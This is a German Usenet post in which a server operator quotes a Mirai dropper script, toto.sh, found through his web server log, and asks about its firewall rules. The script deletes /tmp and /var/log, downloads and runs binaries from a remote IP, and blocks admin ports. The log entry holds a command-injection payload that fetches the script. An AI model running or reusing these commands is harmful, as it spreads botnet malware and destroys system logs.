Google Groups no longer supports new Usenet posts or subscriptions. Historical content remains viewable.
Dismiss

toto.sh

1 view
Skip to first unread message

Andreas Kohlbach

unread,
Apr 2, 2022, 4:40:22 PM4/2/22
to
Gerade aus Langeweile mal ins Log des Webservers geschaut. Das toto.sh
(siehe unten) hat folgenden Inhalt:

--8<---------------cut here---------------start------------->8---
rm -rf /tmp
rm -rf /var/log
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /etc/init.d || cd /; wget http://179.43.142.11/bins/x86; curl -O http://179.43.142.11/bins/x86;cat x86 >toto;chmod +x *;./toto toto.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /etc/init.d || cd /; wget http://179.43.142.11/bins/mips; curl -O http://179.43.142.11/bins/mips;cat mips >toto;chmod +x *;./toto toto.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /etc/init.d || cd /; wget http://179.43.142.11/bins/mpsl; curl -O http://179.43.142.11/bins/mpsl;cat mpsl >toto;chmod +x *;./toto toto.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /etc/init.d || cd /; wget http://179.43.142.11/bins/arm4; curl -O http://179.43.142.11/bins/arm4;cat arm4 >toto;chmod +x *;./toto toto.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /etc/init.d || cd /; wget http://179.43.142.11/bins/arm5; curl -O http://179.43.142.11/bins/arm5;cat arm5 >toto;chmod +x *;./toto toto.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /etc/init.d || cd /; wget http://179.43.142.11/bins/arm6; curl -O http://179.43.142.11/bins/arm6;cat arm6 >toto;chmod +x *;./toto toto.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /etc/init.d || cd /; wget http://179.43.142.11/bins/arm7; curl -O http://179.43.142.11/bins/arm7;cat arm7 >toto;chmod +x *;./toto toto.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /etc/init.d || cd /; wget http://179.43.142.11/bins/ppc; curl -O http://179.43.142.11/bins/ppc;cat ppc >toto;chmod +x *;./toto toto.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /etc/init.d || cd /; wget http://179.43.142.11/bins/m68k; curl -O http://179.43.142.11/bins/m68k;cat m68k >toto;chmod +x *;./toto toto.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /etc/init.d || cd /; wget http://179.43.142.11/bins/sh4; curl -O http://179.43.142.11/bins/sh4;cat sh4 >toto;chmod +x *;./toto toto.exploit
iptables -F
iptables -A INPUT -p tcp --dport 22 -j DROP
iptables -A INPUT -p tcp --dport 23 -j DROP
iptables -A INPUT -p tcp --dport 2323 -j DROP
iptables -A INPUT -p tcp --dport 80 -j DROP
iptables -A INPUT -p tcp --dport 443 -j DROP
iptables -A INPUT -p tcp --dport 8080 -j DROP
iptables -A INPUT -p tcp --dport 9000 -j DROP
iptables -A INPUT -p tcp --dport 8089 -j DROP
iptables -A INPUT -p tcp --dport 7070 -j DROP
iptables -A INPUT -p tcp --dport 8081 -j DROP
iptables -A INPUT -p tcp --dport 9090 -j DROP
iptables -A INPUT -p tcp --dport 161 -j DROP
iptables -A INPUT -p tcp --dport 5555 -j DROP
iptables -A INPUT -p tcp --dport 9600 -j DROP
iptables -A INPUT -p tcp --dport 21412 -j DROP
iptables -A INPUT -p tcp --dport 5986 -j DROP
iptables -A INPUT -p tcp --dport 5985 -j DROP
iptables -A INPUT -p tcp --dport 17998 -j DROP
iptables -A INPUT -p tcp --dport 7547 -j DROP
iptables-save--8<---------------cut here---------------end--------------->8---

Das x86 aber ich runtergeladen und bei Virustotal eingeworfen, was das Mirai
Exploit erkannte. Soweit klar.

Was mich aber wundert, warum versucht wird, die Ports zu filtern. Und im
Serverlog steht zudem:

45.61.184.191 127.0.0.1 - [02/Apr/2022:13:39:20 -0400] "GET /cgi-bin/downloadFlile.cgi?payload=`wget http://179.43.142.11/toto.sh;chmod 777 toto.sh;sh toto.sh` HTTP/1.1" 404 341 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36"

Statt der 127.0.0.1 steht normal meine öffentliche IP. Warum dort
127.0.0.1? Sorgen muss ich mir aber wohl keine machen, da der Zugriff mit 404
abgelehnt wurde. /cgi-bin/downloadFlile.cgi existiert eh nicht.
--
Andreas
0 new messages